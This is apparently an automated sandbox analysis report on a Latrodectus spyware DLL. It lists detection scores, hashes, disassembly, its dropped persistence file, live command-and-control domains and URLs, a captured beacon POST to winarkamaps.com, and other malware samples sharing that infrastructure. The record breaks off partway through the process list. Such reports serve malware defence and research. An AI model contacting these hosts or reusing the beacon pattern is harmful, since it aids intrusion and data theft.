Is malicious
Internet

Source	Detection	Scanner	Label	Link
r2iL9TLvO3.dll	80%	Virustotal		Browse
r2iL9TLvO3.dll	66%	ReversingLabs	Win64.Spyware.Latrodectus
r2iL9TLvO3.dll	100%	Avira	TR/Agent.dxjic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll	100%	Avira	TR/Agent.dxjic
C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll	66%	ReversingLabs	Win64.Spyware.Latrodectus
C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll	80%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
winarkamaps.com	20%	Virustotal		Browse
stratimasesstr.com	18%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://winarkamaps.com/q	100%	Avira URL Cloud	malware
https://winarkamaps.com/live/comp	100%	Avira URL Cloud	phishing
https://stratimasesstr.com/F	100%	Avira URL Cloud	malware
https://winarkamaps.com/live/	100%	Avira URL Cloud	malware
https://winarkamaps.com/live/al	100%	Avira URL Cloud	malware
https://stratimasesstr.com/live/l	100%	Avira URL Cloud	phishing
https://winarkamaps.com/%	100%	Avira URL Cloud	malware
https://stratimasesstr.com/	100%	Avira URL Cloud	malware
https://winarkamaps.com/live/	18%	Virustotal		Browse
https://winarkamaps.com/m/=	100%	Avira URL Cloud	malware
https://stratimasesstr.com/live/$	100%	Avira URL Cloud	phishing
https://stratimasesstr.com/live/	100%	Avira URL Cloud	malware
https://winarkamaps.com/	100%	Avira URL Cloud	malware
https://winarkamaps.com/live/F	100%	Avira URL Cloud	malware
https://stratimasesstr.com/	18%	Virustotal		Browse
https://winarkamaps.com/live/F	17%	Virustotal		Browse
https://winarkamaps.com/	20%	Virustotal		Browse
https://stratimasesstr.com/live/	16%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
winarkamaps.com	188.114.96.3	true	true	20%, Virustotal, Browse	unknown
stratimasesstr.com	unknown	unknown	true	18%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://winarkamaps.com/live/	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://stratimasesstr.com/live/	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://winarkamaps.com/q	rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://winarkamaps.com/live/al	rundll32.exe, 00000006.00000002.2557574678.000001B8F4BF5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://winarkamaps.com/live/comp	rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://stratimasesstr.com/F	rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://stratimasesstr.com/live/l	rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://winarkamaps.com/%	rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://stratimasesstr.com/	rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://winarkamaps.com/m/=	rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://stratimasesstr.com/live/$	rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://winarkamaps.com/	rundll32.exe, 00000006.00000003.2482822204.000001B8F4C10000.00000004.00000020.00020000.00000000.sdmp	true	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://winarkamaps.com/live/F	rundll32.exe, 00000006.00000002.2557574678.000001B8F4C0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2482822204.000001B8F4C10000.00000004.00000020.00020000.00000000.sdmp	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	winarkamaps.com	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1469006
Start date and time:	2024-07-08 11:38:23 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	r2iL9TLvO3.dll (renamed file extension from exe to dll, renamed because original name is a hash value)
Original Sample Name:	9645a12079edffd20560d4631160a6052ae5728d6f73b7366588166ad281c534.exe
Detection:	MAL
Classification:	mal100.troj.winDLL@15/1@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 59 Number of non-executed functions: 30

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:41:08	API Interceptor	5291034x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	purchase order_pdf.exe	Get hash	malicious	FormBook	Browse	www.evoolihubs.shop/fwdd/?MdEl=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=&cv4D=Bv0xSH88iTF48zS0
	475bc80ba1e4ac7b2f40f2a3e1a677a2ccf1ad7f5e5d5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	651186lm.nyashmyash.top/pipeRequestSecurePacketlowbigloaddefaultTempUploadsTemporary.php
	4LPk0o7T6C.exe	Get hash	malicious	FormBook	Browse	www.mainz-cruise-deals.today/rn94/?CZbDp=fTeDovxhSZ2T70J&2ds=09eGDPUJepCFUU6E4tGoUe5x4dgTJ3zXonwB9AX7AS4ixaR6NbPwPSgI2hlgq7bEBXzd
	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	auth.xn--conbase-sfb.xyz/api.php?{B955B2CC07A01546086603}
	Kxjf9xfVcb.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	911628cm.nyashka.top/imagevideopipehttpLowgameBigloadmultidleLocal.php
	327vRde1h3nsEEG.exe	Get hash	malicious	FormBook	Browse	www.gemaroke2.shop/mc10/?qR-LsrxH=cH0r006G1k9BH3Prdi0o8oeF8aabeeFKkLVVuPEC0gCNiYJWCEK9irK+mrJ5aktgxtn1&TVm0xb=yj88DTHplR0
	http://www.telegramkv.com/	Get hash	malicious	Unknown	Browse	www.telegramkv.com/
	Scan405.exe	Get hash	malicious	FormBook	Browse	www.jjjw.xyz/ypml/
	AuT5pFGTFw.exe	Get hash	malicious	FormBook	Browse	www.coinwab.com/efdt/
	http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/	Get hash	malicious	HTMLPhisher	Browse	business.ifbsmetaiidentiityconfirms.com/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
winarkamaps.com	GLKJoBXIVE.dll	Get hash	malicious	Latrodectus	Browse	104.21.37.64
winarkamaps.com	Util.dll	Get hash	malicious	Bazar Loader, Latrodectus	Browse	172.67.205.12

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SHIPMENT-CMA CGM XIAMEN-1DBSIE1PL- EX1-DOCX.exe	Get hash	malicious	FormBook	Browse	23.227.38.32
	Arc453466701.msi	Get hash	malicious	Unknown	Browse	104.21.76.57
	Arc453466701.msi	Get hash	malicious	Metamorfo	Browse	104.21.76.57
	Arc453466701.msi	Get hash	malicious	Metamorfo	Browse	104.21.76.57
	https://ywg2216-my.sharepoint.com/:u:/g/personal/sumit_sumitdh_com/EZl7EZYIO7ZIh3sekEg3b7gBpng2Rorpmgh8B7EtlV-PZg?e=CU642G	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://germaine-de-capuccini.co.uk	Get hash	malicious	Unknown	Browse	104.21.16.44
	https://accounts.binance.com/bg/register?ref=YY80CKRN	Get hash	malicious	Unknown	Browse	104.18.32.137
	Shipping Documents.exe	Get hash	malicious	FormBook	Browse	172.64.152.166
	https://email.abad-ca.com/owa1/##aoc3481@hdel.co.kr	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	dlcdkJcbbV.exe	Get hash	malicious	LummaC, RedLine	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Vidar	Browse	188.114.96.3
	Rhino 8 KG.rar	Get hash	malicious	Unknown	Browse	188.114.96.3
	a77d4e10359c589b166ac047f2d3448badc7e07381496dcfab21b73f7ac49b81_payload.exe	Get hash	malicious	Vidar	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.PWS.Stealer.39021.26401.10948.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	Python Stealer, Amadey, LummaC Stealer, Mars Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	188.114.96.3
	4x21uza5Ws.exe	Get hash	malicious	Vidar	Browse	188.114.96.3
	SecuriteInfo.com.Variant.Babar.372873.20811.19091.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Variant.Babar.372873.20811.19091.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	vrUmCwNelo.dll	Get hash	malicious	Dridex Dropper	Browse	188.114.96.3

Process:	C:\Windows\System32\rundll32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	5.602203637771727
Encrypted:	false
SSDEEP:	768:f0Io0O99dyyus8GhrFuNtxv4c/HFGKndcHrqzwzv1NTNaTWsyih:caO9qyVNKv4c/HFGLlzvi
MD5:	D46476F7F27BE8EF618B7646A46F5E66
SHA1:	8219D1EAD31D16F6380941827BF96A488453D5C0
SHA-256:	9645A12079EDFFD20560D4631160A6052AE5728D6F73B7366588166AD281C534
SHA-512:	8EFBA2B2CB757DECC55C7B2AEDB1A7B2645D95DDB22087F20D713456BFB6D09B90779370E7C8D8E567D22D8E96D7239F9B65152C6879CBDF9258CF02F690C7A0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 66% Antivirus: Virustotal, Detection: 80%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{............p.+...........D......D......D.....Rich............PE..d...N..f.........." .........4......\|<.......................................@............`.............................................x.......<............ ...............0..........................................................@............................text............................... ..`.rdata..............................@..@.data...`#..........................@....pdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Entropy (8bit):	5.602203637771727
TrID:	Win64 Dynamic Link Library (generic) (102004/3) 86.43% Win64 Executable (generic) (12005/4) 10.17% Generic Win/DOS Executable (2004/3) 1.70% DOS Executable Generic (2002/1) 1.70% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	r2iL9TLvO3.dll
File size:	61'440 bytes
MD5:	d46476f7f27be8ef618b7646a46f5e66
SHA1:	8219d1ead31d16f6380941827bf96a488453d5c0
SHA256:	9645a12079edffd20560d4631160a6052ae5728d6f73b7366588166ad281c534
SHA512:	8efba2b2cb757decc55c7b2aedb1a7b2645d95ddb22087f20d713456bfb6d09b90779370e7c8d8e567d22d8e96d7239f9b65152c6879cbdf9258cf02f690c7a0
SSDEEP:	768:f0Io0O99dyyus8GhrFuNtxv4c/HFGKndcHrqzwzv1NTNaTWsyih:caO9qyVNKv4c/HFGLlzvi
TLSH:	F5534F87EBA261E9DCBAD57486637527F8707C4D5038BB0A8F619E136F22720F52C784
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{..............p.+..............D.......D.......D......Rich............PE..d...N..f.........." .........4......\|<.............

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x180003c7c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x180000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6613D54E [Mon Apr 8 11:30:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	db7aeb75528663639689f852fd366243

Entrypoint Preview

Instruction
dec esp
mov dword ptr [esp+18h], eax
mov dword ptr [esp+10h], edx
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 18h
mov eax, dword ptr [esp+28h]
mov dword ptr [esp], eax
cmp dword ptr [esp], 01h
je 00007F24AD201114h
jmp 00007F24AD20111Eh
dec eax
mov eax, dword ptr [esp+20h]
dec eax
mov dword ptr [0000C837h], eax
mov eax, 00000001h
dec eax
add esp, 18h
ret
int3
dec eax
sub esp, 38h
call 00007F24AD200CC0h
mov dword ptr [esp+20h], eax
cmp dword ptr [esp+20h], 00000000h
jne 00007F24AD201125h
xor eax, eax
cmp eax, 01h
je 00007F24AD20111Eh
mov ecx, 000003E8h
call 00007F24AD209D70h
jmp 00007F24AD2010FFh
xor eax, eax
dec eax
add esp, 38h
ret
int3
int3
dec eax
sub esp, 28h
call 00007F24AD2010DCh
xor eax, eax
dec eax
add esp, 28h
ret
dec esp
mov dword ptr [esp+18h], eax
mov dword ptr [esp+10h], edx
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 000001C8h
cmp dword ptr [esp+000001D8h], 12h
je 00007F24AD201152h
cmp dword ptr [esp+000001D8h], 0Eh
je 00007F24AD201148h
cmp dword ptr [esp+000001D8h], 0Ch
je 00007F24AD20113Eh
cmp dword ptr [esp+000001D8h], 0Dh
je 00007F24AD201134h
cmp dword ptr [esp+000001D8h], 0Fh
je 00007F24AD20112Ah
cmp dword ptr [esp+000001D8h], 04h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xe480	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe4f8	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x12000	0x6d8	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x13000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xe090	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe000	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc3cc	0xc400	daced1e25a37750d3e573d26743527aa	False	0.40439652423469385	zlib compressed data	5.42109374466797	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x5d6	0x600	1443fcdf6d941caad8a894b59cbf8317	False	0.5442708333333334	data	4.56235176800514	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xf000	0x2360	0x1600	c6f791ef0b88e56476abb0f454a0cd63	False	0.5024857954545454	data	6.676622463781846	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x12000	0x6d8	0x800	5d61590e3fcef31da47c9638e83a1d10	False	0.4541015625	data	3.871670986438023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x13000	0xc	0x200	f3469c0b0ee9c852546ac64a5d6db5b3	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	PeekNamedPipe, GetLastError, CreateMutexW
USER32.dll	MessageBeep, MessageBoxA

Exports

Name	Ordinal	Address
extra	1	0x180003ce4
follower	2	0x180003ce4
run	3	0x180003ce4
scub	4	0x180003ce4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 8, 2024 11:40:41.335103989 CEST	49708	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:40:41.335155964 CEST	443	49708	188.114.96.3	192.168.2.7
Jul 8, 2024 11:40:41.335226059 CEST	49708	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:40:41.349721909 CEST	49708	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:40:41.349756956 CEST	443	49708	188.114.96.3	192.168.2.7
Jul 8, 2024 11:40:41.828989029 CEST	443	49708	188.114.96.3	192.168.2.7
Jul 8, 2024 11:40:41.829135895 CEST	49708	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:40:41.893208027 CEST	49708	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:40:41.893261909 CEST	443	49708	188.114.96.3	192.168.2.7
Jul 8, 2024 11:40:41.893553972 CEST	443	49708	188.114.96.3	192.168.2.7
Jul 8, 2024 11:40:41.897325993 CEST	49708	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:40:41.901226997 CEST	49708	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:40:41.944502115 CEST	443	49708	188.114.96.3	192.168.2.7
Jul 8, 2024 11:41:20.672075033 CEST	443	49708	188.114.96.3	192.168.2.7
Jul 8, 2024 11:41:20.672158957 CEST	443	49708	188.114.96.3	192.168.2.7
Jul 8, 2024 11:41:20.672167063 CEST	49708	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:41:20.672229052 CEST	49708	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:41:20.672512054 CEST	49708	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:41:20.672533989 CEST	443	49708	188.114.96.3	192.168.2.7
Jul 8, 2024 11:41:20.770823002 CEST	49709	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:41:20.770881891 CEST	443	49709	188.114.96.3	192.168.2.7
Jul 8, 2024 11:41:20.770953894 CEST	49709	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:41:20.771253109 CEST	49709	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:41:20.771265984 CEST	443	49709	188.114.96.3	192.168.2.7
Jul 8, 2024 11:41:21.277477026 CEST	443	49709	188.114.96.3	192.168.2.7
Jul 8, 2024 11:41:21.277558088 CEST	49709	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:41:21.278364897 CEST	49709	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:41:21.278378963 CEST	443	49709	188.114.96.3	192.168.2.7
Jul 8, 2024 11:41:21.280271053 CEST	49709	443	192.168.2.7	188.114.96.3
Jul 8, 2024 11:41:21.280277967 CEST	443	49709	188.114.96.3	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 8, 2024 11:40:41.309509039 CEST	57366	53	192.168.2.7	1.1.1.1
Jul 8, 2024 11:40:41.329724073 CEST	53	57366	1.1.1.1	192.168.2.7
Jul 8, 2024 11:41:20.717067003 CEST	63036	53	192.168.2.7	1.1.1.1
Jul 8, 2024 11:41:20.753175974 CEST	53	63036	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 8, 2024 11:40:41.309509039 CEST	192.168.2.7	1.1.1.1	0x3666	Standard query (0)	winarkamaps.com	A (IP address)	IN (0x0001)	false
Jul 8, 2024 11:41:20.717067003 CEST	192.168.2.7	1.1.1.1	0xa83d	Standard query (0)	stratimasesstr.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 8, 2024 11:40:41.329724073 CEST	1.1.1.1	192.168.2.7	0x3666	No error (0)	winarkamaps.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 8, 2024 11:40:41.329724073 CEST	1.1.1.1	192.168.2.7	0x3666	No error (0)	winarkamaps.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 8, 2024 11:41:20.753175974 CEST	1.1.1.1	192.168.2.7	0xa83d	Name error (3)	stratimasesstr.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

winarkamaps.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49708	188.114.96.3	443	7620	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-08 09:40:41 UTC	228	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: winarkamaps.com Content-Length: 252 Cache-Control: no-cache
2024-07-08 09:40:41 UTC	252	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 72 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 4d 56 35 78 6e 48 68 4b 65 68 58 57 4b 50 55 63 2b 46 6d 46 52 61 74 36 62 77 37 38 45 4b 6d 58 65 6a 65 5a 4b 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 43 39 69 48 30 48 66 5a 53 5a 75 36 61 49 57 70 77 31 45 46 41 30 63 77 78 6d 54 71 68 42 76 51 73 58 76 74 49 4f 2f 45 6e 62 64 66 67 4f 67 65 2f 7a 75 53 32 43 34 35 45 35 30 37 36 4b 75 34 2f 47 73 61 56 5a 46 79 53 67 75 76 77 37 4c 44 44 71 59 52 6f 35 39 77 42 56 51 30 31 71 59 6c 65 79 6c 70 4d 43 66 33 62 51 4e 51 73 68 78 77 4d 6a 6b 31 64 76 36 6f 4e 6b 59 79 62 65 6d 6e 4d 53 4b 54 62 2f 69 56 2b 5a 38 53 73 61 62 65 70 50 48 54 42 41 58 47 70 6e 41 Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiCzMV5xnHhKehXWKPUc+FmFRat6bw78EKmXejeZKBWLUUfs9FloPMfPu+9sL8KXzJchOQ7C9iH0HfZSZu6aIWpw1EFA0cwxmTqhBvQsXvtIO/EnbdfgOge/zuS2C45E5076Ku4/GsaVZFySguvw7LDDqYRo59wBVQ01qYleylpMCf3bQNQshxwMjk1dv6oNkYybemnMSKTb/iV+Z8SsabepPHTBAXGpnA
2024-07-08 09:41:20 UTC	737	IN	HTTP/1.1 522 Date: Mon, 08 Jul 2024 09:41:20 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bxzd0xFqHv6A62r6fwPVvTaEZSKvPmQSGyyowF%2BeMQ0UBCHz37nntcBM3xmi6htiI5IslgrljYIFQGR65G%2FuyAxNouhsIyx74fZniytv5Ng40QNv5ixvsqXZSbFju3CRQZA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 89ff1d423a374333-EWR alt-svc: h3=":443"; ma=86400
2024-07-08 09:41:20 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49709	188.114.96.3	443	7620	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-08 09:41:21 UTC	228	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: winarkamaps.com Content-Length: 252 Cache-Control: no-cache
2024-07-08 09:41:21 UTC	252	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 72 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 7a 4d 56 35 78 6e 48 68 4b 65 68 58 57 4b 50 55 63 2b 46 6d 46 52 61 74 36 62 77 37 38 45 4b 6d 58 65 6a 65 5a 4b 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 43 39 69 48 30 48 66 5a 53 5a 75 36 61 49 57 70 77 31 45 46 41 30 63 77 78 6d 54 71 68 42 76 51 73 58 76 74 49 4f 2f 45 6e 62 64 66 67 4f 67 65 2f 7a 75 53 32 43 34 35 45 35 30 37 36 4b 75 34 2f 47 73 61 56 5a 46 79 53 67 75 76 77 37 4c 44 44 71 59 52 6f 35 39 77 42 56 51 30 31 71 59 6c 65 79 6c 70 4d 43 66 33 62 51 4e 51 73 68 78 77 4d 6a 6b 31 64 76 36 6f 4e 6b 59 79 62 65 6d 6e 4d 53 4b 54 62 2f 69 56 2b 5a 38 53 73 61 62 65 70 50 48 54 42 41 58 47 70 6e 41 Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiCzMV5xnHhKehXWKPUc+FmFRat6bw78EKmXejeZKBWLUUfs9FloPMfPu+9sL8KXzJchOQ7C9iH0HfZSZu6aIWpw1EFA0cwxmTqhBvQsXvtIO/EnbdfgOge/zuS2C45E5076Ku4/GsaVZFySguvw7LDDqYRo59wBVQ01qYleylpMCf3bQNQshxwMjk1dv6oNkYybemnMSKTb/iV+Z8SsabepPHTBAXGpnA

Target ID:	0
Start time:	05:39:20
Start date:	08/07/2024
Path:	C:\Windows\System32\loaddll64.exe
Wow64 process (32bit):	false
Commandline:	loaddll64.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll"
Imagebase:	0x7ff622450000
File size:	165'888 bytes
MD5 hash:	763455F9DCB24DFEECC2B9D9F8D46D52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:39:20
Start date:	08/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:39:20
Start date:	08/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
